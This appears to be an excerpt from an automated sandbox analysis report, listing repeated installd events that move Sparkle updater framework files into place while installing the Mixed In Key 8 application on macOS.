              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ru.lproj/.BC.T_poMeIt -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ru.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cy.lproj/.BC.T_8f5FAP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cy.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_Caqbiw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/SUStatus.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fr.lproj/.BC.T_ZEbXN1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fr.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fi.lproj/.BC.T_1ROV7Q -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fi.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/id.lproj/.BC.T_GEYvY0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/id.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/nl.lproj/.BC.T_lxbJhm -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/nl.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/th.lproj/.BC.T_1G80BN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/th.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ro.lproj/.BC.T_S1fqDs -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ro.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ca.lproj/.BC.T_RAimHn -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ca.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_5jP6rP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/Sparkle.icnsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_W2qavB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_rL0Yor -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/PkgInfoJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/.BC.T_c0odLt -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/.BC.T_MuPpul -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_7BHn1J -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_G3KZrH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_eBgZ8M -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_zi6jWE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_kMRPSO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_yH8ucj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_XMiW2e -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUPasswordPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_YdfVE0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_uYtdSt -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_sCQbk2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_W8Tre5 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_ISNgxv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_gcJisC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_Inf0xe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_f55ZHH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_BTW4FZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUPasswordPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_ReykOw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_ExBD6E -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_oxQCG0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/SUModelTranslation.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_DOpnRx -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/Sparkle.stringsJump to behavior
